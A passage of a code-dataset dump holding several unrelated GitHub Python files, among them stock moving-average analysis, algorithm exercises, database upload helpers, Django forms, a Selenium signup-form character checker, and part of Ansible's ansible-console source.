종목의 해당 기간동안의 종가 데이터만 가져오기\n # Valid periods: 1d,5d,1mo,3mo,6mo,1y,2y,5y,10y,ytd,max\n hist = data.history(period=\"1y\")[['Close']]\n\n # 제일 최근 날짜의 종가 가져오기\n hist1 = hist.tail(1)\n recent_price_2 = hist1.values.tolist()\n recent_price_3 = sum(recent_price_2, [])\n recent_price = recent_price_3[0]\n\n # 5일 평균 구하기\n # 가져온 데이터는 최근 데이터일수록 아래에 가며 스택 형식으로 출력된다\n # -> 그래서 아래의 5개만 들고온다\n hist5 = hist.tail(5)\n # 가져온 종목은 데이터 프레임이기 때문에 연산을 위해 리스트로 바꿔주기\n hist_list = hist5.values.tolist()\n # 이상하게 2차원으로 들어가 있으므로 1차원 리스트로 바꾸기\n hist_list = sum(hist_list, [])\n average5 = round(sum(hist_list) / 5, 2)\n\n # 20일 평균 구하기\n hist20 = hist.tail(20)\n hist_list = hist20.values.tolist()\n hist_list = sum(hist_list, [])\n average20 = round(sum(hist_list) / 20, 2)\n\n # 60일 평균 구하기\n hist60 = hist.tail(60)\n hist_list = hist60.values.tolist()\n hist_list = sum(hist_list, [])\n average60 = round(sum(hist_list) / 60, 2)\n\n # 120일 평균 구하기\n hist120 = hist.tail(120)\n hist_list = hist120.values.tolist()\n hist_list = sum(hist_list, [])\n average120 = round(sum(hist_list) / 120, 2)\n\n # print(average5)\n # print(average20)\n # print(average60)\n # print(average120)\n\n # 제일 최근 종가와 각각의 평균선 값 비교하기\n text = \"\"\n result = 0\n # 120일 선보다 낮음 & 5일 위\n if average120 > recent_price > average5:\n text = \"120일 보다 낮음 & 5일 위\"\n result = round((recent_price - average120) / average120 * 100, 1)\n # 120일 보다 낮을 때\n elif recent_price < average120:\n text = \"120일 보다 낮음\"\n result = round((recent_price - average120) / average120 * 100, 1)\n # 60일 보다 낮음 & 5일 위\n elif average60 > recent_price > average5:\n text = \"60일 보다 낮음 & 5일 위\"\n result = round((recent_price - average60) / average60 * 100, 1)\n # 60일 보다 낮음\n elif recent_price < average60:\n text = \"60일 보다 낮음\"\n result = round((recent_price - average60) / average60 * 100, 1)\n # 20일 보다 낮음 & 5일 위\n elif average20 > recent_price > average20:\n text = \"20일 보다 낮음 & 5일 위\"\n result = round((recent_price - average20) / average20 * 100, 1)\n # 20일 보다 낮음\n elif recent_price < average20:\n text = \"20일 보다 낮음\"\n result = round((recent_price - average20) / average20 * 100, 1)\n # 5일 보다 낮음\n elif recent_price < average5:\n text = \"5일 보다 낮음\"\n result = round((recent_price - average5) / average5 * 100, 1)\n else:\n text = \"\"\n result = \"\"\n\n average_Stock_excel.write_excel(i, average5, average20, average60, average120, text, result)\n\n i += 1\n\n\n\n\n\n\n","repo_name":"mmol93/yahooFinance","sub_path":"average_Stock.py","file_name":"average_Stock.py","file_ext":"py","file_size_in_byte":4469,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"88"} +{"seq_id":"4494634699","text":"def main():\n N = int(input())\n lis = [list(map(int, input().split())) for _ in range(N)]\n option_num = 3\n DP = [[0] * option_num for _ in range(N)]\n DP[0] = lis[0]\n for i in range(1, N):\n # 各要素に対して、前と同一の要素以外との足し合わせで最大値を取る。\n for j in range(3):\n for k in range(3):\n if j == k:\n continue\n DP[i][j] = max(DP[i-1][k] + lis[i][j], DP[i][j])\n\n return max(DP[N-1])\n\n\nprint(main())\n","repo_name":"masa08/algorithm_and_data_structure","sub_path":"atcoder/edpc/vacation.py","file_name":"vacation.py","file_ext":"py","file_size_in_byte":532,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"88"} +{"seq_id":"23938947238","text":"import logging\nfrom .pull_params import pull_params\n\ndef insert_sample_analyst(cur, yml_dict, csv_template, uploader):\n \"\"\"\n \"\"\"\n \n params = ['contactid']\n inputs = pull_params(params, yml_dict, csv_template, 'ndb.sampleanalysts')\n get_contact = \"\"\"SELECT * FROM ndb.contacts WHERE contactname %% %(contactname)s;\"\"\"\n \n contids = []\n baseid = 1\n for i in inputs['contactid']:\n cur.execute(get_contact, {'contactname': i})\n contids.append({'contactname': i, 'id': cur.fetchone()[0], 'order': baseid})\n baseid = baseid + 1\n \n result = []\n counter = 0\n for i in range(len(uploader['samples'])):\n for contact in contids:\n inserter = \"\"\"\n SELECT ts.insertsampleanalyst(_sampleid := %(sampleid)s,\n _contactid := %(contactid)s,\n _analystorder := %(analystorder)s)\n \"\"\"\n cur.execute(inserter, {'sampleid': int(uploader['samples'][counter]), \n 'contactid': int(contact['id']),\n 'analystorder': int(contact['order'])})\n result.append(cur.fetchone()[0])\n counter += 1\n\n return result","repo_name":"NeotomaDB/DataBUS","sub_path":"neotomaUploader/insert_sample_analyst.py","file_name":"insert_sample_analyst.py","file_ext":"py","file_size_in_byte":1295,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"88"} +{"seq_id":"40142229558","text":"import numpy as np\nimport random\nimport matplotlib.pyplot as plt\nimport scipy.stats\n\nfrom SimulationPython.Simulation.Util import Util\n\na = 10\nD = 2\nt = 4\n\ndef propa(z0, z1):\n return 1/a + (2/a)*np.sum([np.exp(-n**2 * np.pi**2 *D*t/a**2)*np.cos(n*np.pi*z0/a)*np.cos(n*np.pi*z1/a) for n in range(1, 11)], axis=0)\n\n#points = np.linspace(0, a, 500)\n#plt.plot(points, propa(0, points))\n#plt.show()\n\nzNumber = 100000\n\ndisp = np.empty(zNumber)\n\nfor i in range(zNumber):\n z0 = Util.getRandomU(a) + a/2 ###########\n next = False\n while not(next):\n z1 = Util.getRandomU(a) + a/2\n proba = propa(z0, z1)\n assert proba <= 1\n if random.random() < proba:\n disp[i] = z1 - z0\n next = True\n\nbw = 2*scipy.stats.iqr(disp, rng=(25, 75))/(len(disp))**(1/3)\nnBins = int((np.max(disp) - np.min(disp))/bw)\nplt.hist(disp, bins=nBins, density = True, stacked=True)\nplt.show()\n\ndef signal(q):\n return np.transpose(np.abs( np.average(np.exp(1j*np.matmul(np.transpose(np.matrix(disp)), np.matrix(q))), axis=0) ))\n\ntheoretical = Util.getSignal_plane_fin(a, D, t, 10)\nqPoints = np.linspace(0, 1.5, 101)[1:]\nplt.plot(qPoints, signal(qPoints))\nplt.plot(qPoints, theoretical(qPoints), color=\"red\")\nplt.yscale(\"log\")\nplt.show()\n\n","repo_name":"LouisNewmanRGB/MFE","sub_path":"SimulationPython/_propagator_sampling.py","file_name":"_propagator_sampling.py","file_ext":"py","file_size_in_byte":1259,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"88"} +{"seq_id":"34260270175","text":"from django import forms\nfrom .models import Post,Post_Comment\nPOSITION_CHOICES=[\n ('개발', '개발'),\n ('디자인','디자인'),\n ('기획','기획'),\n]\nclass PostForm(forms.ModelForm):\n title = forms.CharField(\n widget=forms.TextInput(\n attrs={'placeholder': '제목 입력',\n 'class' : 'form-control',\n }, \n ),\n )\n\n content = forms.CharField(\n label='내용',\n widget=forms.Textarea(\n attrs={'class': 'form-control'},\n ),\n )\n \n category = forms.ChoiceField( \n required=True,\n # attrs={'required': True}\n widget=forms.RadioSelect, \n choices=POSITION_CHOICES,\n )\n\n class Meta:\n model = Post\n fields = ('title','content','category',)\n\nclass PostCommentForm(forms.ModelForm):\n class Meta:\n model = Post_Comment\n fields = ('content',)","repo_name":"rabBit64/django-pairprj2","sub_path":"posts/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":929,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"88"} +{"seq_id":"21467980419","text":"'''print(\"***The values below are odd numbers***\")\nfor odd_numbers in range(1,101):\n if(odd_numbers%2 != 0):\n print(odd_numbers)\n\nprint(\"***The values below are even numbers***\")\nfor even_numbers in range(1,101):\n if(even_numbers%2 == 0):\n print(even_numbers)\n'''\nS = 1\nE = 100\nfor num in range(S, E+1):\n if num>1:\n for i in range(2,num):\n if(num % i==0):\n break\n else:\n print(num, end=\" \")","repo_name":"samaraorega/Inspire-Youth-In-STEM-2","sub_path":"Week2/odd_even.py","file_name":"odd_even.py","file_ext":"py","file_size_in_byte":464,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"88"} +{"seq_id":"44346492423","text":"from conf.configuration import *\nimport pandas as pd\nimport csv\nfrom utils import *\ndef read_file(file_path):\n file = open(file_path,'r',encoding='utf-8',errors=\"ignore\")\n lines =[]\n for line in file:\n l = line.replace('\\n','').replace('\\t','')\n lines.append(l)\n return \" \".join(lines)\n\ndef load_topics():\n path_topics=get_path_preprocessed_topics('ibm-debater-claim-evidence-acl')\n df_topics=pd.read_csv(path_topics,sep=\",\",encoding=\"utf-8\")\n return df_topics\n\ndef generate_document_topic(df_documents):\n path_evidence=get_path_source_part('ibm-debater-claim-evidence-acl', 'evidence')\n df_topics=load_topics()\n df_evidence=pd.read_csv(path_evidence,sep=\",\",encoding=\"utf-8\")\n df_evidence=df_evidence[['Topic','Article']]\n df_evidence.drop_duplicates(['Topic','Article'],inplace=True)\n df_evidence.rename(columns={'Topic':'topic','Article':'topic-key'},inplace=True)\n df_documents=df_documents.merge(df_evidence,on='topic-key')\n\n df_documents=df_documents.merge(df_topics,on='topic')\n #df_documents=df_documents[['topic-id','document','document-id']]\n return df_documents\n\ndef preprocess():\n path_corpus_ascii = get_path_source_part(\"ibm-debater-claim-evidence-acl\", \"documents\")\n path_preprocessed_documents = get_path_preprocessed_documents('ibm-debater-claim-evidence-acl')\n path_document_topic=get_path_document_topic('ibm-debater-claim-evidence-acl')\n for root,dirs,files in os.walk(path_corpus_ascii):\n documents = []\n for file_name in files:\n file_path = os.path.join(root,file_name)\n file_content = read_file(file_path)\n documents.append(file_content)\n topic_keys=[file.replace('_',' ') for file in files]\n df_documents = pd.DataFrame({\"document\":documents,\"document-id\":files,'topic-key':topic_keys})\n\n df_documents['document']=df_documents.apply((lambda row: drop_separator(row['document'],\"\\\",\\\"\")),axis=1)\n df_documents.to_csv(path_preprocessed_documents,quotechar='\"',sep=\",\",quoting=csv.QUOTE_ALL,encoding=\"utf-8\",\\\n columns=['document-id','document'],index=False)\n df_document_topic=generate_document_topic(df_documents)\n df_document_topic.to_csv(path_document_topic,quotechar='\"',sep=\",\",quoting=csv.QUOTE_ALL,encoding=\"utf-8\", \\\n columns=['document-id','topic-id'],index=False)\n return documents,files\n\ndef extract_topics():\n path_topics=get_path_preprocessed_topics('ibm-debater-claim-evidence-acl')\n path_evidence=get_path_source_part('ibm-debater-claim-evidence-acl', 'evidence')\n df_evidence=pd.read_csv(path_evidence,sep=\",\",encoding=\"utf-8\")\n df_topics=df_evidence[['Topic']]\n df_topics=df_topics.drop_duplicates(['Topic'])\n df_topics.rename(columns={'Topic':'topic'},inplace=True)\n df_topics['topic-id']=range(0,df_topics.shape[0])\n df_topics.to_csv(path_topics,columns={'topic-id','topic'},sep=\",\",encoding=\"utf-8\",index=False)\n\n\n#extract_topics()\npreprocess()","repo_name":"webis-de/topic-ontologies-for-arguments","sub_path":"preprocessing/preprocess_ibm_debater_claim_evidence_acl.py","file_name":"preprocess_ibm_debater_claim_evidence_acl.py","file_ext":"py","file_size_in_byte":2994,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"88"} +{"seq_id":"38389468532","text":"import time\n\nfrom selenium.common.exceptions import WebDriverException\nfrom selenium.webdriver.chrome.options import Options\nfrom webdriver_manager.chrome import ChromeDriverManager\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.common.keys import Keys\n\nfrom utf8_iterator import utf8_iterator\n\n\nclass Checker:\n def __init__(self):\n self.browser = webdriver.Chrome(ChromeDriverManager().install())\n self.allowed_characters = []\n\n def char_is_allowed(self):\n checkmark = self.browser.find_element(By.XPATH, '//*[@id=\"id_random_characters\"]/i')\n return bool('fa_ok' in checkmark.get_attribute('class'))\n\n def start(self):\n self.open_page('https://account.elderscrollsonline.com/register/account-information')\n element_input_field = self.browser.find_element(By.XPATH, '//*[@id=\"user_screen_name\"]')\n\n j = 0\n last_printout = ''\n for i, char in enumerate(utf8_iterator()):\n # We are not interested in these characters:\n # < 32 - special characters\n # 39 - \"'\"\n # 45 - \"-\"\n # 46 - \".\"\n # 48-122 - \"0-9, A-Z, a-z\n # 127 - special character\n\n if i < 128:\n continue\n\n element_input_field.clear()\n element_input_field.send_keys('Test')\n\n element_input_field.send_keys(char, 'end')\n\n last_printout = f'{char} {i}\\t'\n print(last_printout, end='')\n\n time.sleep(0.33)\n\n if self.char_is_allowed():\n j += 1\n if j >= 10:\n print()\n j = 0\n self.allowed_characters.append(char)\n else:\n print('\\010' * len(last_printout), end='')\n\n self.stop()\n\n def enter_date(self):\n field_year = self.browser.find_element(By.XPATH, '//*[@id=\"date_year\"]')\n field_month = self.browser.find_element(By.XPATH, '//*[@id=\"date_month\"]')\n field_day = self.browser.find_element(By.XPATH, '//*[@id=\"date_day\"]')\n\n field_year.send_keys('1997')\n # TODO: english support\n field_month.send_keys('апреля')\n field_day.send_keys('3')\n\n button_send = self.browser.find_element(By.XPATH, '//*[@id=\"age-gate\"]/form/div[2]/input')\n button_send.submit()\n\n def open_page(self, address: str):\n self.browser.get(address)\n\n # if enter your date of birth presented\n # TODO: english support\n if 'ВВЕДИТЕ ДАТУ РОЖДЕНИЯ' in self.browser.page_source:\n self.enter_date()\n\n def stop(self):\n try:\n self.browser.close()\n except: # Silence all exception because we can\n pass\n self.print_all_allowed_characters()\n\n def print_all_allowed_characters(self):\n print('Valid characters are: ')\n for i, character in enumerate(self.allowed_characters):\n if i and i % 10 == 0:\n print()\n print(character, end='\\t')\n\n def __del__(self):\n self.stop()\n\n\nif __name__ == '__main__':\n instance = Checker()\n try:\n instance.start()\n except KeyboardInterrupt:\n print('\\nInterrupted, wait...')\n except WebDriverException:\n print('\\nProbably, browser was closed')\n finally:\n instance = None\n","repo_name":"imPDA/eso_symbols","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3408,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"88"} +{"seq_id":"2843125268","text":"from dwave.system import DWaveSampler\r\nimport dimod\r\n\r\nsampler=DWaveSampler()\r\nqubits = sampler.nodelist\r\ncouplers = sampler.edgelist\r\n\r\n\r\nedges_linea = {}\r\ni = qubits.pop(0)\r\nnodes_linea={i:-1}\r\nkeep = True\r\nwhile keep:\r\n keep = False\r\n for j in qubits:\r\n if (i,j) in couplers:\r\n nodes_linea[j]=-1\r\n edges_linea[(i,j)]=2\r\n i=j\r\n qubits.remove(i)\r\n keep = True\r\n break\r\n\r\nbqm_linea = dimod.BinaryQuadraticModel(nodes_linea, edges_linea, 0.0, 'BINARY')\r\nprint(bqm_linea)","repo_name":"aitorgtt/Comparacion","sub_path":"crear_instancia_linea.py","file_name":"crear_instancia_linea.py","file_ext":"py","file_size_in_byte":548,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"88"} +{"seq_id":"74998868126","text":"def zip_longest(*args, fill=None) -> list[tuple]:\n for elem in args:\n if not isinstance(elem, (list, tuple)):\n raise TypeError('Invalid input data, not all elements is sequence')\n\n result = []\n biggest_seq = max(args, key=len)\n\n for i in range(len(biggest_seq)):\n temp = []\n for seq in args:\n try:\n temp.append(seq[i])\n except IndexError:\n temp.append(fill)\n result.append(tuple(temp))\n\n return result\n","repo_name":"Dudnik-Denys/tasks","sub_path":"stepik_pygen_profy/profy_9/profy_9_1/profy_9_1_15.py","file_name":"profy_9_1_15.py","file_ext":"py","file_size_in_byte":508,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"88"} +{"seq_id":"73100729888","text":"from __future__ import annotations\n\n# ansible.cli needs to be imported first, to ensure the source bin/* scripts run that code first\nfrom ansible.cli import CLI\n\nimport atexit\nimport cmd\nimport getpass\nimport readline\nimport os\nimport sys\n\nfrom ansible import constants as C\nfrom ansible import context\nfrom ansible.cli.arguments import option_helpers as opt_help\nfrom ansible.executor.task_queue_manager import TaskQueueManager\nfrom ansible.module_utils.common.text.converters import to_native, to_text\nfrom ansible.module_utils.parsing.convert_bool import boolean\nfrom ansible.parsing.splitter import parse_kv\nfrom ansible.playbook.play import Play\nfrom ansible.plugins.list import list_plugins\nfrom ansible.plugins.loader import module_loader, fragment_loader\nfrom ansible.utils import plugin_docs\nfrom ansible.utils.color import stringc\nfrom ansible.utils.display import Display\n\ndisplay = Display()\n\n\nclass ConsoleCLI(CLI, cmd.Cmd):\n '''\n A REPL that allows for running ad-hoc tasks against a chosen inventory\n from a nice shell with built-in tab completion (based on dominis'\n ``ansible-shell``).\n\n It supports several commands, and you can modify its configuration at\n runtime:\n\n - ``cd [pattern]``: change host/group\n (you can use host patterns eg.: ``app*.dc*:!app01*``)\n - ``list``: list available hosts in the current path\n - ``list groups``: list groups included in the current path\n - ``become``: toggle the become flag\n - ``!``: forces shell module instead of the ansible module\n (``!yum update -y``)\n - ``verbosity [num]``: set the verbosity level\n - ``forks [num]``: set the number of forks\n - ``become_user [user]``: set the become_user\n - ``remote_user [user]``: set the remote_user\n - ``become_method [method]``: set the privilege escalation method\n - ``check [bool]``: toggle check mode\n - ``diff [bool]``: toggle diff mode\n - ``timeout [integer]``: set the timeout of tasks in seconds\n (0 to disable)\n - ``help [command/module]``: display documentation for\n the command or module\n - ``exit``: exit ``ansible-console``\n '''\n\n name = 'ansible-console'\n modules = [] # type: list[str] | None\n ARGUMENTS = {'host-pattern': 'A name of a group in the inventory, a shell-like glob '\n 'selecting hosts in inventory or any combination of the two separated by commas.'}\n\n # use specific to console, but fallback to highlight for backwards compatibility\n NORMAL_PROMPT = C.COLOR_CONSOLE_PROMPT or C.COLOR_HIGHLIGHT\n\n def __init__(self, args):\n\n super(ConsoleCLI, self).__init__(args)\n\n self.intro = 'Welcome to the ansible console. Type help or ? to list commands.\\n'\n\n self.groups = []\n self.hosts = []\n self.pattern = None\n self.variable_manager = None\n self.loader = None\n self.passwords = dict()\n\n self.cwd = '*'\n\n # Defaults for these are set from the CLI in run()\n self.remote_user = None\n self.become = None\n self.become_user = None\n self.become_method = None\n self.check_mode = None\n self.diff = None\n self.forks = None\n self.task_timeout = None\n self.collections = None\n\n cmd.Cmd.__init__(self)\n\n def init_parser(self):\n super(ConsoleCLI, self).init_parser(\n desc=\"REPL console for executing Ansible tasks.\",\n epilog=\"This is not a live session/connection: each task is executed in the background and returns its results.\"\n )\n opt_help.add_runas_options(self.parser)\n opt_help.add_inventory_options(self.parser)\n opt_help.add_connect_options(self.parser)\n opt_help.add_check_options(self.parser)\n opt_help.add_vault_options(self.parser)\n opt_help.add_fork_options(self.parser)\n opt_help.add_module_options(self.parser)\n opt_help.add_basedir_options(self.parser)\n opt_help.add_runtask_options(self.parser)\n opt_help.add_tasknoplay_options(self.parser)\n\n # options unique to shell\n self.parser.add_argument('pattern', help='host pattern', metavar='pattern', default='all', nargs='?')\n self.parser.add_argument('--step', dest='step', action='store_true',\n help=\"one-step-at-a-time: confirm each task before running\")\n\n def post_process_args(self, options):\n options = super(ConsoleCLI, self).post_process_args(options)\n display.verbosity = options.verbosity\n self.validate_conflicts(options, runas_opts=True, fork_opts=True)\n return options\n\n def get_names(self):\n return dir(self)\n\n def cmdloop(self):\n try:\n cmd.Cmd.cmdloop(self)\n\n except KeyboardInterrupt:\n self.cmdloop()\n\n except EOFError:\n self.display(\"[Ansible-console was exited]\")\n self.do_exit(self)\n\n def set_prompt(self):\n login_user = self.remote_user or getpass.getuser()\n self.selected = self.inventory.list_hosts(self.cwd)\n prompt = \"%s@%s (%d)[f:%s]\" % (login_user, self.cwd, len(self.selected), self.forks)\n if self.become and self.become_user in [None, 'root']:\n prompt += \"# \"\n color = C.COLOR_ERROR\n else:\n prompt += \"$ \"\n color = self.NORMAL_PROMPT\n self.prompt = stringc(prompt, color, wrap_nonvisible_chars=True)\n\n def list_modules(self):\n return list_plugins('module', self.collections)\n\n def default(self, line, forceshell=False):\n \"\"\" actually runs modules \"\"\"\n if line.startswith(\"#\"):\n return False\n\n if not self.cwd:\n display.error(\"No host found\")\n return False\n\n # defaults\n module = 'shell'\n module_args = line\n\n if forceshell is not True:\n possible_module, *possible_args = line.split()\n if module_loader.find_plugin(possible_module):\n # we found module!\n module = possible_module\n if possible_args:\n module_args = ' '.join(possible_args)\n else:\n module_args = ''\n\n if self.callback:\n cb = self.callback\n elif C.DEFAULT_LOAD_CALLBACK_PLUGINS and C.DEFAULT_STDOUT_CALLBACK != 'default':\n cb = C.DEFAULT_STDOUT_CALLBACK\n else:\n cb = 'minimal'\n\n result = None\n try:\n check_raw = module in C._ACTION_ALLOWS_RAW_ARGS\n task = dict(action=dict(module=module, args=parse_kv(module_args, check_raw=check_raw)), timeout=self.task_timeout)\n play_ds = dict(\n name=\"Ansible Shell\",\n hosts=self.cwd,\n gather_facts='no',\n tasks=[task],\n remote_user=self.remote_user,\n become=self.become,\n become_user=self.become_user,\n become_method=self.become_method,\n check_mode=self.check_mode,\n diff=self.diff,\n collections=self.collections,\n )\n play = Play().load(play_ds, variable_manager=self.variable_manager, loader=self.loader)\n except Exception as e:\n display.error(u\"Unable to build command: %s\" % to_text(e))\n return False\n\n try:\n # now create a task queue manager to execute the play\n self._tqm = None\n try:\n self._tqm = TaskQueueManager(\n inventory=self.inventory,\n variable_manager=self.variable_manager,\n loader=self.loader,\n passwords=self.passwords,\n stdout_callback=cb,\n run_additional_callbacks=C.DEFAULT_LOAD_CALLBACK_PLUGINS,\n run_tree=False,\n forks=self.forks,\n )\n\n result = self._tqm.run(play)\n display.debug(result)\n finally:\n if self._tqm:\n self._tqm.cleanup()\n if self.loader:\n self.loader.cleanup_all_tmp_files()\n\n if result is None:\n display.error(\"No hosts found\")\n return False\n except KeyboardInterrupt:\n display.error('User interrupted execution')\n return False\n except Exception as e:\n if self.verbosity >= 3:\n import traceback\n display.v(traceback.format_exc())\n display.error(to_text(e))\n return False\n\n def emptyline(self):\n return\n\n def do_shell(self, arg):\n \"\"\"\n You can run shell commands through the shell module.\n\n eg.:\n shell ps uax | grep java | wc -l\n shell killall python\n shell halt -n\n\n You can use the ! to force the shell module. eg.:\n !ps aux | grep java | wc -l\n \"\"\"\n self.default(arg, True)\n\n def help_shell(self):\n display.display(\"You can run shell commands through the shell module.\")\n\n def do_forks(self, arg):\n \"\"\"Set the number of forks\"\"\"\n if arg:\n try:\n forks = int(arg)\n except TypeError:\n display.error('Invalid argument for \"forks\"')\n self.usage_forks()\n\n if forks > 0:\n self.forks = forks\n self.set_prompt()\n\n else:\n display.display('forks must be greater than or equal to 1')\n else:\n self.usage_forks()\n\n def help_forks(self):\n display.display(\"Set the number of forks to use per task\")\n self.usage_forks()\n\n def usage_forks(self):\n display.display('Usage: forks ')\n\n do_serial = do_forks\n help_serial = help_forks\n\n def do_collections(self, arg):\n \"\"\"Set list of collections for 'short name' usage\"\"\"\n if arg in ('', 'none'):\n self.collections = None\n elif not arg:\n self.usage_collections()\n else:\n collections = arg.split(',')\n for collection in collections:\n if self.collections is None:\n self.collections = []\n self.collections.append(collection.strip())\n\n if self.collections:\n display.v('Collections name search is set to: %s' % ', '.join(self.collections))\n else:\n display.v('Collections name search is using defaults')\n\n def help_collections(self):\n display.display(\"Set the collection name search path when using short names for plugins\")\n self.usage_collections()\n\n def usage_collections(self):\n display.display('Usage: collections [, ...]\\n Use empty quotes or \"none\" to reset to default.\\n')\n\n def do_verbosity(self, arg):\n \"\"\"Set verbosity level\"\"\"\n if not arg:\n display.display('Usage: verbosity ')\n else:\n try:\n display.verbosity = int(arg)\n display.v('verbosity level set to %s' % arg)\n except (TypeError, ValueError) as e:\n display.error('The verbosity must be a valid integer: %s' % to_text(e))\n\n def help_verbosity(self):\n display.display(\"Set the verbosity level, equivalent to -v for 1 and -vvvv for 4.\")\n\n def do_cd(self, arg):\n \"\"\"\n Change active host/group. You can use hosts patterns as well eg.:\n cd webservers\n cd webservers:dbservers\n cd webservers:!phoenix\n cd webservers:&staging\n cd webservers:dbservers:&staging:!phoenix\n \"\"\"\n if not arg:\n self.cwd = '*'\n elif arg in '/*':\n self.cwd = 'all'\n elif self.inventory.get_hosts(arg):\n self.cwd = arg\n else:\n display.display(\"no host matched\")\n\n self.set_prompt()\n\n def help_cd(self):\n display.display(\"Change active host/group. \")\n self.usage_cd()\n\n def usage_cd(self):\n display.display(\"Usage: cd ||\")\n\n def do_list(self, arg):\n \"\"\"List the hosts in the current group\"\"\"\n if not arg:\n for host in self.selected:\n display.display(host.name)\n elif arg == 'groups':\n for group in self.groups:\n display.display(group)\n else:\n display.error('Invalid option passed to \"list\"')\n self.help_list()\n\n def help_list(self):\n display.display(\"List the hosts in the current group or a list of groups if you add 'groups'.\")\n\n def do_become(self, arg):\n \"\"\"Toggle whether plays run with become\"\"\"\n if arg:\n self.become = boolean(arg, strict=False)\n display.v(\"become changed to %s\" % self.become)\n self.set_prompt()\n else:\n display.display(\"Please specify become value, e.g. `become yes`\")\n\n def help_become(self):\n display.display(\"Toggle whether the tasks are run with become\")\n\n def do_remote_user(self, arg):\n \"\"\"Given a username, set the remote user plays are run by\"\"\"\n if arg:\n self.remote_user = arg\n self.set_prompt()\n else:\n display.display(\"Please specify a remote user, e.g. `remote_user root`\")\n\n def help_remote_user(self):\n display.display(\"Set the user for use as login to the remote target\")\n\n def do_become_user(self, arg):\n \"\"\"Given a username, set the user that plays are run by when using become\"\"\"\n if arg:\n self.become_user = arg\n else:\n display.display(\"Please specify a user, e.g. `become_user jenkins`\")\n display.v(\"Current user is %s\" % self.become_user)\n self.set_prompt()\n\n def help_become_user(self):\n display.display(\"Set the user for use with privilege escalation (which remote user attempts to 'become' when become is enabled)\")\n\n def do_become_method(self, arg):\n \"\"\"Given a become_method, set the privilege escalation method when using become\"\"\"\n if arg:\n self.become_method = arg\n display.v(\"become_method changed to %s\" % self.become_method)\n else:\n display.display(\"Please specify a become_method, e.g. `become_method su`\")\n display.v(\"Current become_method is %s\" % self.become_method)\n\n def help_become_method(self):\n display.display(\"Set the privilege escalation plugin to use when become is enabled\")\n\n def do_check(self, arg):\n \"\"\"Toggle whether plays run with check mode\"\"\"\n if arg:\n self.check_mode = boolean(arg, strict=False)\n display.display(\"check mode changed to %s\" % self.check_mode)\n else:\n display.display(\"Please specify check mode value, e.g. `check yes`\")\n display.v(\"check mode is currently %s.\" % self.check_mode)\n\n def help_check(self):\n display.display(\"Toggle check_mode for the tasks\")\n\n def do_diff(self, arg):\n \"\"\"Toggle whether plays run with diff\"\"\"\n if arg:\n self.diff = boolean(arg, strict=False)\n display.display(\"diff mode changed to %s\" % self.diff)\n else:\n display.display(\"Please specify a diff value , e.g. `diff yes`\")\n display.v(\"diff mode is currently %s\" % self.diff)\n\n def help_diff(self):\n display.display(\"Toggle diff output for the tasks\")\n\n def do_timeout(self, arg):\n \"\"\"Set the timeout\"\"\"\n if arg:\n try:\n timeout = int(arg)\n if timeout < 0:\n display.error('The timeout must be greater than or equal to 1, use 0 to disable')\n else:\n self.task_timeout = timeout\n except (TypeError, ValueError) as e:\n display.error('The timeout must be a valid positive integer, or 0 to disable: %s' % to_text(e))\n else:\n self.usage_timeout()\n\n def help_timeout(self):\n display.display(\"Set task timeout in seconds\")\n self.usage_timeout()\n\n def usage_timeout(self):\n display.display('Usage: timeout ')\n\n def do_exit(self, args):\n \"\"\"Exits from the console\"\"\"\n sys.stdout.write('\\nAnsible-console was exited.\\n')\n return -1\n\n def help_exit(self):\n display.display(\"LEAVE!\")\n\n do_EOF = do_exit\n help_EOF = help_exit\n\n def helpdefault(self, module_name):\n if module_name:\n in_path = module_loader.find_plugin(module_name)\n if in_path:\n oc, a, _dummy1, _dummy2 = plugin_docs.get_docstring(in_path, fragment_loader)\n if oc:\n display.display(oc['short_description'])\n display.display('Parameters:')\n for opt in oc['options'].keys():\n display.display(' ' + stringc(opt, self.NORMAL_PROMPT) + ' ' + oc['options'][opt]['description'][0])\n else:\n display.error('No documentation found for %s.' % module_name)\n else:\n display.error('%s is not a valid command, use ? to list all valid commands.' % module_name)\n\n def help_help(self):\n display.warning(\"Don't be redundant!\")\n\n def complete_cd(self, text, line, begidx, endidx):\n mline = line.partition(' ')[2]\n offs = len(mline) - len(text)\n\n if self.cwd in ('all', '*', '\\\\'):\n completions = self.hosts + self.groups\n else:\n completions = [x.name for x in self.inventory.list_hosts(self.cwd)]\n\n return [to_native(s)[offs:] for s in completions if to_native(s).startswith(to_native(mline))]\n\n def completedefault(self, text, line, begidx, endidx):\n if line.split()[0] in self.list_modules():\n mline = line.split(' ')[-1]\n offs = len(mline) - len(text)\n completions = self.module_args(line.split()[0])\n\n return [s[offs:] + '=' for s in completions if s.startswith(mline)]\n\n def module_args(self, module_name):\n in_path = module_loader.find_plugin(module_name)\n oc, a, _dummy1, _dummy2 = plugin_docs.get_docstring(in_path, fragment_loader, is_module=True)\n return list(oc['options'].keys())\n\n def run(self):\n\n super(ConsoleCLI, self).run()\n\n sshpass = None\n becomepass = None\n\n # hosts\n self.pattern = context.CLIARGS['pattern']\n self.cwd = self.pattern\n\n # Defaults from the command line\n self.remote_user = context.CLIARGS['remote_user']\n self.become = context.CLIARGS['become']\n self.become_user = context.CLIARGS['become_user']\n self.become_method = context.CLIARGS['become_method']\n self.check_mode = context.CLIARGS['check']\n self.diff = context.CLIARGS['diff']\n self.forks = context.CLIARGS['forks']\n self.task_timeout = context.CLIARGS['task_timeout']\n\n # set module path if needed\n if context.CLIARGS['module_path']:\n for path in context.CLIARGS['module_path']:\n if path:\n module_loader.add_directory(path)\n\n # dynamically add 'cannonical' modules as commands, aliases coudld 